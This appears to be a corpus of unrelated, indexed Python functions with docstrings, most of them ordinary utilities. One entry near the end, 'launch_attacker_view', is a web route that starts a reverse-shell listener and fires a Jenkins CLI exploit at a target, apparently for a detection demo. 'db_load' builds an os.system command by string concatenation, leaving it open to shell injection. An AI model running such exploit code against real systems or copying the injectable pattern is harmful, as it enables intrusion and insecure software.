print(ent.label_, ent.text)
5,348,636
def imayavi_remove_source(src):
    """Safely remove a specific vtk source

    Args:
        src (vtk_data_source): vtk data source to remove
    """
    src.stop()
    try:
        try:
            src.data.release_data()
        except TraitError:
            src.data.release_data_flag = 1
        src.cell_scalars_name = ''
        src.cell_tensors_name = ''
        src.cell_vectors_name = ''
        src.point_scalars_name = ''
        src.point_tensors_name = ''
        src.point_vectors_name = ''
    except AttributeError:
        pass
    src.start()
    src.stop()
    src.remove()
5,348,637
def lines_to_word_occurrences(in_file, stdout):
    """For each line of input, output (word, 1) for each word in the line"""
    for line in in_file:
        for word in WORD_RE.findall(line):
            _write(stdout, word, 1)
5,348,638
def create_atoms(atoms, atom_dict):
    """Transform the atom types in a molecule (e.g., H, C, and O)
    into the indices (e.g., H=0, C=1, and O=2).
    """
    atoms = [atom_dict[a] for a in atoms]
    return np.array(atoms)
5,348,639
def uint2float(A, bits, x_min, x_max=None):
    """
    Converts uint[bits] to the corresponding floating point value
    in the range [x_min, x_max].
    """
    if x_max is None:
        x_min, x_max = x_range(x_min)
    return x_min + (x_max - x_min) * A / ((1 << bits) - 1)
5,348,640
def test_get_all_pos_error():
    """Check that we get an error when we don't specify qso."""
    cat = catalog.Catalog("foo")
    with pytest.raises(ValueError, match="Only know how to do QSOs right now"):
        cat.get_all_pos()
    return
5,348,641
def partCmp(verA: str, verB: str) -> int:
    """Compare parts of a semver.

    Args:
        verA (str): lhs part to compare
        verB (str): rhs part to compare

    Returns:
        int: 0 if equal, 1 if verA > verB and -1 if verA < verB
    """
    if verA == verB or verA == "*" or verB == "*":
        return 0
    if int(verA) > int(verB):
        return 1
    return -1
5,348,642
def plot_clustering(X, Y_hat, color=[1, 0, 0], mode='outer', show=False, savefn=''):
    """Plot boundaries produced by segmentation."""
    # Initialize subplots
    fg, ax = plt.subplots(ncols=1, figsize=(10, 10))

    # Plot prediction
    im = ax.imshow(mark_boundaries(X, Y_hat, color=color, mode=mode, background_label=0))
    divider = make_axes_locatable(ax)
    cax = divider.append_axes("right", size="5%", pad=0.05)
    plt.colorbar(im, cax=cax)
    ax.get_xaxis().set_visible(False)
    ax.get_yaxis().set_visible(False)

    if show:
        # Pause to show figure
        plt.show()

    if savefn:
        # Save figure without padding
        fg.savefig(savefn, bbox_inches='tight', pad_inches=0.0)
5,348,643
def OrigPosLemConcordancer(sentences, annots, textMnt, wordType="word", nrows=10): """Output HTML for the text (including lemma and pos tags) identified by the AQAnnotation (typically a sentence annotation). Below the sentence (in successive rows) output the original terms, parts of speech, and lemma terms for the text identified by the AQAnnotation. Args: sentences: Sentence annotations that you would like to display. annots: The Dataframe of AQAnnotations that will contain the the AQAnnotations (orig, lemma, pos) for the above sentences textPath: Path for the str files. The sentence annotations must be for documents contained in these str files. wordType: The annotType that identies the AQAnnotation in the above annotations. nrows: Number of sentences to display Returns: HTML """ def _buildOrigPosLemmaRow(entryType, entry): return ("<tr>" + "<td>" + entryType + "</td>" + "<td bgcolor='grey'/>" + "<td bgcolor='grey'/>" + entry + "</tr>") sentenceAnnots = sentences.sort("docId","startOffset").limit(nrows).collect() tmpStr = "" docId = "" docText = "" text= "" lastDoc = "" curDoc = "" # Get the TextAnnotations (for the specified annotType) for each sentence for sentence in sentenceAnnots: textAnnots = annots.filter((col("docId") == sentence.docId) & (col("annotType") == wordType) & (col("startOffset") >= sentence.startOffset) & (col("endOffset") <= sentence.endOffset)) \ .sort("startOffset") \ .collect() # Get the raw text for the sentence annotation if docId != sentence.docId: docid = sentence.docId try: with io.open(textMnt + sentence.docId,'r',encoding='utf-8') as f: docText = f.read() except Exception as ex: print(ex) docText = "" if docText != "": text = docText[sentence.startOffset:sentence.endOffset] else: text = "" tmpStr += "<table border='1' style='font-family: monospace;table-layout: fixed;'><tr>" tmpStr += ("<td>" + sentence.docId + "</td>") tmpStr += ("<td>" + str(sentence.startOffset) + "</td>") tmpStr += ("<td>" + str(sentence.endOffset) + "</td>") tmpStr += ("<td colspan='" + str(len(textAnnots)) + "'>" + text + "</td>") tmpStr += "</tr>" # Get original row origEntry = "" for annot in textAnnots: if (annot.properties != None) and ('orig' in annot.properties) and (len(annot.properties['orig']) > 0): origEntry += ("<td>" + unquote_plus(annot.properties['orig']) + "</td>") else: origEntry += ("<td> </td>") tmpStr += _buildOrigPosLemmaRow('orig',origEntry) # Get pos row posEntry = "" for annot in textAnnots: if (annot.properties != None) and ('pos' in annot.properties) and (len(annot.properties['pos']) > 0): posEntry += ("<td>" + unquote_plus(annot.properties['pos']) + "</td>") else: posEntry += ("<td> </td>") tmpStr += _buildOrigPosLemmaRow('pos',posEntry) # Get lemma row lemmaEntry = "" for annot in textAnnots: if (annot.properties != None) and ('lemma' in annot.properties) and (len(annot.properties['lemma']) > 0): lemmaEntry += ("<td>" + unquote_plus(annot.properties['lemma']) + "</td>") else: lemmaEntry += ("<td> </td>") tmpStr += _buildOrigPosLemmaRow('lemma',lemmaEntry) tmpStr += "</table><p/><p/><p/>" return "<html><body>" + tmpStr + "</body></html>"
5,348,644
def get_args(**kwargs):
    """Generate cli args

    Arguments:
        kwargs[dict]: Pair value in which key is the arg and value a tuple
            with the help message and default value

    Returns:
        Namespace: Args namespace object
    """
    parser = argparse.ArgumentParser()
    for key, (help, default) in kwargs.items():
        parser.add_argument("--{}".format(key), help=help, default=default)
    return parser.parse_args()
5,348,645
def dispfps(handler, n=100):
    """Average iterations per second over last n iterations.

    Args:
        handler (generator): Generator that yields data.
        n (int, optional): Number of iterations to average over. Defaults to 100.

    Yields:
        pyobj: Forwards data from handler
    """
    times = deque()
    for data in handler:
        end = time.time()
        times.append(end)
        if len(times) > n:
            diff = end - times.popleft()
            print(f"\rFPS: {(n / diff):.3f}", end="")
        yield data
5,348,646
def show_hidden_article(request, id):
    """
    Show a hidden (non-public) article.
    """
    db = connect_mongodb_database(request)
    article = db.articles.find_one({
        'Id': int(id), 'IsPublic': False
    })
    if article is None:
        return HttpResponse(404)
    return render_admin_and_back(request, 'show-hidden-article.html', {
        'page': u'隐私文章 - ' + article['Title'],
        'article': article,
    })
5,348,647
def MakeNormalPmf(mu, sigma, num_sigmas, n=201):
    """Makes a PMF discrete approx to a Normal distribution.

    mu: float mean
    sigma: float standard deviation
    num_sigmas: how many sigmas to extend in each direction
    n: number of values in the Pmf

    returns: normalized Pmf
    """
    pmf = Pmf()
    low = mu - num_sigmas * sigma
    high = mu + num_sigmas * sigma

    for x in np.linspace(low, high, n):
        p = EvalNormalPdf(x, mu, sigma)
        pmf.Set(x, p)
    pmf.Normalize()
    return pmf
5,348,648
def _val_from_env(env, attr):
    """Transforms env-strings to python."""
    val = os.environ[env]
    if attr == 'rules':
        val = _rules_from_env(val)
    elif attr == 'wait_command':
        val = int(val)
    elif attr in ('require_confirmation', 'no_colors'):
        val = val.lower() == 'true'
    return val
5,348,649
def histogram(a, bins, ranges):
    """
    Examples
    --------
    >>> x = np.random.uniform(0., 1., 100)
    >>> H, xedges = np.histogram(x, bins=5, range=[0., 1.])
    >>> Hn = histogram(x, bins=5, ranges=[0., 1.])
    >>> assert np.all(H == Hn)
    """
    hist_arr = np.zeros((bins,), dtype=a.dtype)
    return _hist1d_numba_seq(hist_arr, a, bins, np.asarray(ranges))
5,348,650
def testfile(path, shell='/bin/sh', indent=2, env=None, cleanenv=True, debug=False, testname=None): """Run test at path and return input, output, and diff. This returns a 3-tuple containing the following: (list of lines in test, same list with actual output, diff) diff is a generator that yields the diff between the two lists. If a test exits with return code 80, the actual output is set to None and diff is set to []. Note that the TESTDIR, TESTFILE, and TESTSHELL environment variables are available to use in the test. :param path: Path to test file :type path: bytes or str :param shell: Shell to run test in :type shell: bytes or str or list[bytes] or list[str] :param indent: Amount of indentation to use for shell commands :type indent: int :param env: Optional environment variables for the test shell :type env: dict or None :param cleanenv: Whether or not to sanitize the environment :type cleanenv: bool :param debug: Whether or not to run in debug mode (don't capture stdout) :type debug: bool :param testname: Optional test file name (used in diff output) :type testname: bytes or None :return: Input, output, and diff iterables :rtype: (list[bytes], list[bytes], collections.Iterable[bytes]) """ f = open(path, 'rb') try: abspath = os.path.abspath(path) env = env or os.environ.copy() env['TESTDIR'] = envencode(os.path.dirname(abspath)) env['TESTFILE'] = envencode(os.path.basename(abspath)) if testname is None: # pragma: nocover testname = os.path.basename(abspath) return test(f, shell, indent=indent, testname=testname, env=env, cleanenv=cleanenv, debug=debug) finally: f.close()
5,348,651
def is_valid_python_code(src_string: str):
    """True if, and only if, ``src_string`` is valid python.

    Valid python is defined as 'ast.parse(src_string)` doesn't raise a ``SyntaxError``'
    """
    try:
        ast_parse(src_string)
        return True
    except SyntaxError:
        return False
5,348,652
def rss_format_export_post():
    """
    :return:
    """
    try:
        payload = request.get_json(force=True)  # post data in json
    except:
        payload = dict(request.form)  # post data in form encoding

    if 'link' in payload:
        link = read_value_list_or_not(payload, 'link')
    else:
        link = ''

    results, status = export_post(request, 'RSS')
    if status == 200:
        return return_rss_format_export(solr_data=results, link=link)
    return return_response(results, status)
5,348,653
def send_file(app, name, content_type, file_like, node, user):
    """Upload file to OSF."""
    file_like.seek(0)
    with app.test_request_context():
        upload_url = storage_utils.get_waterbutler_upload_url(
            user,
            node,
            path=name,
        )
    requests.put(
        upload_url,
        data=file_like,
        headers={'Content-Type': content_type},
    )
5,348,654
def on_command(name: Union[str, CommandName_T], *, logger: Logger, checkfunc: Callable[[CommandSession], bool] = None, wait_for: Callable[[], bool] = None, cooldown: int = 0, use_default_infolog: bool = True, aliases: Union[Iterable[str], str] = (), permission: int = nonebot.permission.EVERYBODY, only_to_me: bool = True, privileged: bool = False, shell_like: bool = False, **kwargs) -> Callable: """on_command装饰器。被装饰的函数应当接受两个参数session及bot。 参数: name:命令名称。 logger:日志器。 checkfunc:检查是否应该工作的函数。函数执行返回True则执行功能,否则退出。 wait_for: 等待函数。函数执行返回为True后再执行功能,否则等待1秒直到返回为True。 cooldown:命令运行后的冷却时间。冷却时间内无法再次运行。 use_default_infolog:是否使用默认info级别的日志记录。 aliases:命令别名。 permission:命令所需权限。 only_to_me:是否仅响应私聊或者at机器人的指令。 privileged:是否允许复数次执行。 shell_like:是否是类shell指令。 """ def deco(func) -> Callable: @wraps(func) async def wrapper(session: CommandSession): if session.event['user_id'] in BLACKLIST['user']: return if session.event['message_type'] == 'group' and session.event['group_id'] in BLACKLIST['group']: return if checkfunc is not None: if not ((await checkfunc(session) if asyncio.iscoroutinefunction(checkfunc) else checkfunc(session))): return if wait_for is not None: count = 0 while not ((await wait_for()) if asyncio.iscoroutinefunction(wait_for) else wait_for()): await asyncio.sleep(1) count += 1 if count >= _wait_for_maxtime: raise WaitForTimeoutError funcname = func.__module__ + '.' + func.__name__ if funcname in _cooldown_functions[session.self_id].keys(): return try: await func(session, bot) if use_default_infolog: if session.event['message_type'] == 'group': logger.info(f'<Command> Group {session.event["group_id"]} user {session.event["user_id"]} call {funcname} successfully') else: logger.info(f'<Command> Private user {session.event["user_id"]} call {funcname} successfully') except (_PauseException, _FinishException, SwitchException) as e: raise e except Warning as w: logger.warning(f'<Command> Warning {type(w)} occured while {funcname} is running.') except (ApiNotAvailable, RetryExhaustedError) as a: logger.error(f'<Command> Error {type(a)} occured while {funcname} is running.') except ActionFailed as a: logger.error(f'<Command> Error {type(a)} occured while {funcname} is running, retcode = {a.retcode}.') except Exception as e: logger.exception(f'<Command> Error {type(e)} occured while {funcname} is running.') if cooldown > 0: if funcname not in _cooldown_functions[session.self_id]: _cooldown_functions[session.self_id][funcname] = cooldown return nonebot.on_command( name, aliases=aliases, permission=permission, only_to_me=only_to_me, privileged=privileged, shell_like=shell_like, )(debuglog(logger)(wrapper)) return deco
5,348,655
def fillOrders(barberId, start, end, step=1):
    """
    Creates orders for the barber with id = barberId

    :param barberId: barber id
    :type: int
    :param start: start of the working day
    :type: datetime.datetime
    :param end: end of the working day
    :type: datetime.datetime
    :param step: interval at which orders are placed, in hours
    :type: datetime.datetime
    :return:
    """
    delta_t = datetime.timedelta(hours=step)
    ordered_time = start
    while ordered_time < end:
        insertOrder(ordered_time, barberId=barberId)
        ordered_time += delta_t
5,348,656
async def urlcheck( api: vq.API, event: vq.Event(), sender: vq.Sender() ): """ Update data for user """ link = re.fullmatch( config.LINK_PATTERN, event.object.message.text ) if event.object.message.peer_id > vq.PEER: if not re.fullmatch( config.LINK_PATTERN, event.object.message.text ) and not ( "action" in event.object.message and event.object.message.action.type in ( "chat_invite_user", "chat_invite_user_by_link" ) ): await api.messages.send( peer_id=event.object.message.peer_id, message=config.INVALID_LINK, random_id=0 ) await api.messages.remove_chat_user( chat_id=event.object.message.peer_id - vq.PEER, user_id=sender.id )
5,348,657
def SetUp(filename, rel_path=RELATIVE_TEST_PATH):
    """ SetUp returns a parsed C Program."""
    if not os.path.exists(PICKLE_FILE):
        KVStore.CreateNewStore(PICKLE_FILE, redhawk.GetVersion())
    return G.GetLanguageSpecificTree(os.path.join(rel_path, filename), PICKLE_FILE, language='c')
5,348,658
def setup_agents(model, initial_locations):
    """Load the simulated initial locations and return a list
    that holds all agents.
    """
    initial_locations = initial_locations.reshape(2, model["n_types"], 30000)
    agents = []
    for typ in range(model["n_types"]):
        for i in range(model["n_agents_by_type"][typ]):
            agents.append(
                Agent(
                    typ=typ,
                    initial_location=initial_locations[typ, :, i],
                    n_neighbours=model["n_neighbours"],
                    require_same_type=model["require_same_type"],
                    max_moves=model["max_moves"],
                )
            )
    return agents
5,348,659
def properties_to_csv(prop_dict : dict, csv_filename : str, epoch_key : str, append : bool=True) -> None: """ Writes a CSV summarizing how training is going by comparing the properties of the generated structures during evaluation to the training set. Also writes the properties to an active tensorboard. Args: ---- prop_dict (dict) : Contains molecular properties. csv_filename (str) : Full path/filename to CSV file. epoch_key (str) : For example, "Training set" or "Epoch {n}". append (bool) : Indicates whether to append to the output file (if the file exists) or start a new one. Default `True`. """ # get all the relevant properties from the dictionary frac_valid = prop_dict[(epoch_key, "fraction_valid")] avg_n_nodes = prop_dict[(epoch_key, "avg_n_nodes")] avg_n_edges = prop_dict[(epoch_key, "avg_n_edges")] frac_unique = prop_dict[(epoch_key, "fraction_unique")] # use the following properties if they exist try: run_time = prop_dict[(epoch_key, "run_time")] frac_valid_pt = round( float(prop_dict[(epoch_key, "fraction_valid_properly_terminated")]), 5 ) frac_pt = round( float(prop_dict[(epoch_key, "fraction_properly_terminated")]), 5 ) except KeyError: run_time = "NA" frac_valid_pt = "NA" frac_pt = "NA" (norm_n_nodes_hist, norm_atom_type_hist, norm_formal_charge_hist, norm_numh_hist, norm_n_edges_hist, norm_edge_feature_hist, norm_chirality_hist) = normalize_evaluation_metrics(prop_dict, epoch_key) if not append: # file does not exist yet, create it with open(csv_filename, "w") as output_file: # write the file header output_file.write( "set, fraction_valid, fraction_valid_pt, fraction_pt, run_time, " "avg_n_nodes, avg_n_edges, fraction_unique, atom_type_hist, " "formal_charge_hist, numh_hist, chirality_hist, " "n_nodes_hist, n_edges_hist, edge_feature_hist\n" ) # append the properties of interest to the CSV file with open(csv_filename, "a") as output_file: output_file.write( f"{epoch_key}, {frac_valid:.3f}, {frac_valid_pt}, {frac_pt}, {run_time}, " f"{avg_n_nodes:.3f}, {avg_n_edges:.3f}, {frac_unique:.3f}, " f"{norm_atom_type_hist}, {norm_formal_charge_hist}, " f"{norm_numh_hist}, {norm_chirality_hist}, {norm_n_nodes_hist}, " f"{norm_n_edges_hist}, {norm_edge_feature_hist}\n" ) # write to tensorboard try: epoch = int(epoch_key.split()[1]) except: pass else: # scalars tb_writer.add_scalar("Evaluation/fraction_valid", frac_valid, epoch) tb_writer.add_scalar("Evaluation/fraction_valid_and_properly_term", frac_valid_pt, epoch) tb_writer.add_scalar("Evaluation/fraction_properly_terminated", frac_pt, epoch) tb_writer.add_scalar("Evaluation/avg_n_nodes", avg_n_nodes, epoch) tb_writer.add_scalar("Evaluation/fraction_unique", frac_unique, epoch)
5,348,660
async def get_active_infraction(
    ctx: Context,
    user: MemberOrUser,
    infr_type: str,
    send_msg: bool = True
) -> t.Optional[dict]:
    """
    Retrieves an active infraction of the given type for the user.

    If `send_msg` is True and the user has an active infraction matching the `infr_type` parameter,
    then a message for the moderator will be sent to the context channel letting them know.
    Otherwise, no message will be sent.
    """
    log.trace(f"Checking if {user} has active infractions of type {infr_type}.")

    active_infractions = await ctx.bot.api_client.get(
        'bot/infractions',
        params={
            'active': 'true',
            'type': infr_type,
            'user__id': str(user.id)
        }
    )
    if active_infractions:
        # Checks to see if the moderator should be told there is an active infraction
        if send_msg:
            log.trace(f"{user} has active infractions of type {infr_type}.")
            await send_active_infraction_message(ctx, active_infractions[0])
        return active_infractions[0]
    else:
        log.trace(f"{user} does not have active infractions of type {infr_type}.")
5,348,661
def __compute_optical_function_vs_s(transporter, particles, optical_function_name):
    # todo Adjust
    """
    Compute values of optical function vs s for one particle, which coordinates are
    x_min, theta_x_min, ... or x_mean - delta_x, ...
    :param transporter: transport function
    :param particles: BunchConfiguration object
    :param optical_function_name: String, name of optical function, as specified in matrix_indexes
    :return: matrix with rows: s and optical function
    """
    particles = transporter(particles)
    result = np.append(particles["end"].T[tmi.ptc_twiss[Parameters.S]].reshape((-1, 1)),
                       particles["end"].T[tmi.ptc_twiss[optical_function_name]].reshape((-1, 1)),
                       axis=1)
    return result
5,348,662
def plot_arb_images(label, data, label_string):
    """
    Neatly displays arbitrary numbers of images from the camera
    returns fig

    Parameters:
    -----------
    label: array of values that each image is labeled by, e.g. time
    data: array of arrays of image data
    label_string: string describing label, e.g. 's'
    """
    length = len(data)
    columns = 10
    if length % columns != 0:
        rows = length / columns + 1
    else:
        rows = length / columns

    fig = _p.figure()
    fig.set_figheight(rows * 5)
    fig.set_figwidth(10)

    for i in range(length):
        ax = fig.add_subplot(rows, columns, i + 1)
        ax.matshow(data[i], vmin=_n.min(data), vmax=_n.max(data))
        ax.set_title('%s\n%.1f%s' % (i, label[i], label_string))
        if i % 10 == 0:
            ax.set_xticks([])
            ax.set_ylabel('pixels')
        else:
            ax.set_xticks([])
            ax.set_yticks([])

    fig.tight_layout()
    return fig
5,348,663
def listGslbServer(**kargs):
    """ List the Servers of KT Cloud GSLB.

    * Args:
        - zone(String, Required) : [KR-CA, KR-CB, KR-M, KR-M2]

    * Examples:
        print(gslb.listGslbServer(zone='KR-M'))
    """
    my_apikey, my_secretkey = c.read_config()
    if not 'zone' in kargs:
        return c.printZoneHelp()
    ZoneName = kargs['zone']
    del kargs['zone']
    kargs['zoneid'] = c.getzoneidbyhname(ZoneName)
    M2Bool = c.IsM2(ZoneName)
    baseurl = c.geturl(ctype='gslb', m2=M2Bool)
    kargs['command'] = 'listGslbServer'
    kargs['response'] = 'json'
    kargs['apikey'] = my_apikey
    return c.makerequest(kargs, baseurl, my_secretkey)
5,348,664
def imencode(image, pix_fmt=IM_RGB, quality=DEFAULT_QUALITY):
    """
    Encode image into jpeg codec
    Adapt convert image pixel color with pix_fmt

    Parameters
    ----------
    image: source
    pix_fmt: format of pixel color. Default: RGB
    quality: JPEG quality image.

    Returns
    -------
    Buffer of image encoded
    """
    check_type("image", image, numpy.ndarray)

    if pix_fmt == IM_RGB:
        image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)

    _, buf = cv2.imencode('.jpeg', image, params=[cv2.IMWRITE_JPEG_QUALITY, int(quality)])
    return buf
5,348,665
def db_load(infile, outfile, db_type):
    """
    Calls the linux db_load command to load up the database files
    The command is:
        db_load -c duplicates=1, -f infile -T -t [ btree | hash | queue | recno ] outfile
    """
    assert db_type == "btree" or db_type == "hash" or \
        db_type == "queue" or db_type == "recno"
    # command = ["db_load", "-c", "duplicates=1", "-f", infile,
    #            "-T", "-t", db_type, outfile]
    # subprocess.run(command)
    if os.path.exists(outfile):
        os.remove(outfile)
    os.system("db_load -c duplicates=1 -f " + infile + " -T -t " + db_type + " " + outfile)
5,348,666
def split_train_test_data(X, Y, train_rate):
    """
    Split the dataset into a training set and a test set.
    :param X: dataset features
    :param Y: dataset labels
    :param train_rate: proportion of the training set
    :return: training features; training labels; test features; test labels
    """
    number = len(X)
    number_train = int(number * train_rate)
    number_test = number - number_train
    train_X = []
    train_Y = []
    test_X = []
    test_Y = []
    for i in range(number):
        if number_test > 0:
            if number_train == 0 or np.random.randint(2) == 0:
                number_test -= 1
                test_X.append(X[i])
                test_Y.append(Y[i])
            else:
                number_train -= 1
                train_X.append(X[i])
                train_Y.append(Y[i])
        else:
            number_train -= 1
            train_X.append(X[i])
            train_Y.append(Y[i])
    return np.array(train_X), np.array(train_Y), np.array(test_X), np.array(test_Y)
5,348,667
def nonsingular_concat(X, vector):
    """Appends vector to matrix X iff the resulting matrix is nonsingular.

    Args:
        X (np.array): NxM Matrix to be appended to
        vector (np.array): Nx1 vector to be appended to X

    Returns:
        new_X (np.array): Nx(M+1) Matrix or None
    """
    # Cast vector to matrix
    vector = np.atleast_2d(vector)
    # Append vector as new row at bottom of matrix
    new_X = np.concatenate((X, vector), axis=0)

    # Check if matrix is still non-singular
    if new_X.shape[0] == np.linalg.matrix_rank(new_X):
        return new_X
    else:
        return None
5,348,668
def get_oxidation_state(element: Union[str, Element]) -> int:
    """Get a typical oxidation state

    If it doesn't exist in the database, 0 is returned.

    Args:
        element (str/ Element): Input element

    Return:
        Oxidation state of the element.
    """
    try:
        return oxidation_state_dict[str(element)]
    except KeyError:
        logger.warning(f"Oxidation state: {element} is unavailable. Set 0.")
        return 0
5,348,669
def __quality_indexes(
    graph: nx.Graph,
    communities: object,
    scoring_function: Callable[[object, object], float],
    summary: bool = True,
) -> object:
    """
    :param graph: NetworkX/igraph graph
    :param communities: NodeClustering object
    :param summary: boolean. If **True**, an aggregated score for the partition is returned,
        otherwise individual community scores are returned. Default **True**.
    :return: If **summary==True** a FitnessResult object, otherwise a list of floats.
    """
    graph = convert_graph_formats(graph, nx.Graph)
    values = []
    for com in communities.communities:
        community = nx.subgraph(graph, com)
        values.append(scoring_function(graph, community))

    if summary:
        return FitnessResult(
            min=min(values), max=max(values), score=np.mean(values), std=np.std(values)
        )
    return values
5,348,670
def test_non_positive_integer_max_exclusive003_1571_non_positive_integer_max_exclusive003_1571_v(mode, save_output, output_format): """ TEST :Facet Schemas for string : facet=maxExclusive and value=-1 and document value=-5 """ assert_bindings( schema="msData/datatypes/Facets/nonPositiveInteger/nonPositiveInteger_maxExclusive003.xsd", instance="msData/datatypes/Facets/nonPositiveInteger/nonPositiveInteger_maxExclusive003.xml", class_name="Test", version="1.1", mode=mode, save_output=save_output, output_format=output_format, structure_style="filenames", )
5,348,671
def serve_scripts(scripts): """ Combines one or more script files into one and embeds them in the small autoCSP JavaScript framework. """ debug = DEBUG and not LOCKED_MODE views_path = os.path.expanduser(PATHS['VIEWS']) with open(views_path + 'static/sha256.js', 'r') as f: sha256js = f.read() template = lib.webinterface.render_template('framework.js', debug=debug, scripts=scripts, sha256js=sha256js) return wrap_static(template, '.js')
5,348,672
def readFromDB_DSC_authorityKey(authorityKey: bytes, connection: Connection) -> DocumentSignerCertificate:
    """Read DSC storage entries from the database by authority key."""
    try:
        logger.info("Reading DSC object from database with authority key.")
        return connection.getSession().query(DocumentSignerCertificateStorage).filter(DocumentSignerCertificateStorage.authorityKey == authorityKey).all()
    except Exception:
        raise DocumentSignerCertificateStorageError("Problem with reading the object")
5,348,673
def history_report(history, config=None, html=True): """ Test a model and save a history report. Parameters ---------- history : memote.HistoryManager The manager grants access to previous results. config : dict, optional The final test report configuration. html : bool, optional Whether to render the report as full HTML or JSON (default True). """ if config is None: config = ReportConfiguration.load() report = HistoryReport(history=history, configuration=config) if html: return report.render_html() else: return report.render_json()
5,348,674
def matrix_reduce():
    """
    Demonstrate TensorFlow reduce operations (sum, mean, max, min) along different axes.
    :return:
    """
    isses = tf.InteractiveSession()
    # sample 3x4 matrix
    X = tf.constant([[1, 2, 3, 4], [2, 3, 4, 5], [3, 4, 5, 6]])
    logger.info("X\n%s" % X.eval())
    logger.info("tf.reduce_sum(X)\n {0}".format(tf.reduce_sum(X).eval()))
    logger.info("tf.reduce_sum(X,axis=0)\n {0}".format(tf.reduce_sum(X, axis=0).eval()))
    logger.info("tf.reduce_sum(X,axis=1)\n {0}".format(tf.reduce_sum(X, axis=1).eval()))
    logger.info("tf.reduce_mean(X)\n {0}".format(tf.reduce_mean(X).eval()))
    logger.info("tf.reduce_mean(X,axis=0)\n {0}".format(tf.reduce_mean(X, axis=0).eval()))
    logger.info("tf.reduce_mean(X,axis=1)\n {0}".format(tf.reduce_mean(X, axis=1).eval()))
    logger.info("tf.reduce_max(X)\n {0}".format(tf.reduce_max(X).eval()))
    logger.info("tf.reduce_max(X,axis=0)\n {0}".format(tf.reduce_max(X, axis=0).eval()))
    logger.info("tf.reduce_max(X,axis=1)\n {0}".format(tf.reduce_max(X, axis=1).eval()))
    logger.info("tf.reduce_min(X)\n {0}".format(tf.reduce_min(X).eval()))
    logger.info("tf.reduce_min(X,axis=0)\n {0}".format(tf.reduce_min(X, axis=0).eval()))
    logger.info("tf.reduce_min(X,axis=1)\n {0}".format(tf.reduce_min(X, axis=1).eval()))
    isses.close()
5,348,675
def derive_from_dem(dem): """derive slope and flow direction from a DEM. Results are returned in a dictionary that contains references to ArcPy Raster objects stored in the "in_memory" (temporary) workspace """ # set the snap raster for subsequent operations env.snapRaster = dem # calculate flow direction for the whole DEM flowdir = FlowDirection(in_surface_raster=dem, force_flow="NORMAL") flow_direction_raster = so("flowdir","random","in_memory") flowdir.save(flow_direction_raster) # calculate slope for the whole DEM slope = Slope(in_raster=dem, output_measurement="PERCENT_RISE", method="PLANAR") slope_raster = so("slope","random","in_memory") slope.save(slope_raster) return { "flow_direction_raster": Raster(flow_direction_raster), "slope_raster": Raster(slope_raster), }
5,348,676
def from_error_details(error: str, message: str, stacktrace: Optional[str]) -> BidiException: """Create specific WebDriver BiDi exception class from error details. Defaults to ``UnknownErrorException`` if `error` is unknown. """ cls = get(error) return cls(error, message, stacktrace)
5,348,677
def tangential_proj(u, n): """ See for instance: https://link.springer.com/content/pdf/10.1023/A:1022235512626.pdf """ return (ufl.Identity(u.ufl_shape[0]) - ufl.outer(n, n)) * u
5,348,678
def test_no_env(argv, expected): """Test outside of any supported CI env. :param iter argv: Mock sys.argv. :param dict expected: Expected return value of get_arguments(). """ environ = dict(PATH='.') actual = get_arguments(['download'] + argv, environ) assert actual == expected
5,348,679
def _RemoveEdges(tris, match):
    """tris is list of triangles.
    match is as returned from _MaxMatch or _GreedyMatch.

    Return list of (A,D,B,C) resulting from deleting edge (A,B)
    causing a merge of two triangles; append to that list
    the remaining unmatched triangles."""

    ans = []
    triset = set(tris)
    while len(match) > 0:
        (_, e, tl, tr) = match.pop()
        (a, b) = e
        if tl in triset:
            triset.remove(tl)
        if tr in triset:
            triset.remove(tr)
        c = _OtherVert(tl, a, b)
        d = _OtherVert(tr, a, b)
        if c is None or d is None:
            continue
        ans.append((a, d, b, c))
    return ans + list(triset)
5,348,680
def viewdata(data): """Prints out readable information of the output of getSearchData""" print('_' * 50) print('Number of Results: ' + str(data[0]['numResults'])) print('\nSearchURL: ' + data[0]['searchURL']) print('_' * 50) i = 1 for m in data[1]: print(str(i) + '. ') for n in m: print(str(n) + ': ' + str(m[n])) i += 1 print('\n')
5,348,681
def cli(): """Extinct Gaming CLI Tools"""
5,348,682
def get_course_authoring_url(course_locator): """ Gets course authoring microfrontend URL """ return configuration_helpers.get_value_for_org( course_locator.org, 'COURSE_AUTHORING_MICROFRONTEND_URL', settings.COURSE_AUTHORING_MICROFRONTEND_URL )
5,348,683
def sumDwellStateSub(params): """Threaded, sums dwell times with 1 day seeing no change & accounting for fractional days""" (dfIn,dwellTime,weight) = params dfOut = dfIn.copy(deep=True) while dwellTime > 1: if dwellTime > 2: increment = 1 else: increment = dwellTime-1 dfOut += dfShift(dfIn,1) * increment dwellTime += -1 return dfOut * weight
5,348,684
def launch_attacker_view(): """ Accepts a JSON payload with the following structure: { "target": "nlb-something.fqdn.com", "attacker": "1.2.3.4" } If the payload parses correctly, then launch a reverse shell listener using pexpect.spawn then spawn the auto-sploit.sh tool and enter the target and attacker info again using pexpect :return: Simple String response for now """ managed_instances = get_managed_instances() if request.method == 'GET': return render_template('routing/attacker_view.html', log_group=log_group, attacker_ip=attacker_ip, managed_instances=managed_instances, gd_events_of_interest=gd_events_of_interest, target_ip=target_ip) if request.method == 'POST': logger.info('Attacker is {} and Victim is {}'.format(attacker_ip, target_ip)) print('Attacker is {} and Victim is {}'.format(attacker_ip, target_ip)) if target_ip == "" or attacker_ip == "": logger.info('Incorrect Json format!') print(request.payload) res = make_response(jsonify( { "result": "error", "message": "ERROR - Incorrect Json format" }), 200) res.headers['Content-type'] = 'application/json' return res # Run auto_sploit.sh _launch_listener() logger.info('launching listener process') # # Create the payload from the attacker source ip input create_payload() # Run the exploit jenkins_cli_url = 'http://' + target_ip + ':80/cli' # # Get an initial session id with download session = exploit_get_sessionid(jenkins_cli_url) # if session: # Try and upload payload if upload_chunked(jenkins_cli_url, session, "asdf"): logger.info('Exploit_launched_ok') res = make_response(jsonify( { "result": "success", "message": "SUCCESS - auto-sploit launched!" }), 200) res.headers['Content-type'] = 'application/json' return res else: logger.info('Failed to launch exploit') res = make_response(jsonify( { "result": "error", "message": "ERROR - Unable to run exploit" }), 200) res.headers['Content-type'] = 'application/json' return res
5,348,685
def stretch(alignment, factor): """Time-stretch the alignment by a constant factor""" # Get phoneme durations durations = [factor * p.duration() for p in alignment.phonemes()] alignment = copy.deepcopy(alignment) alignment.update(durations=durations) return alignment
5,348,686
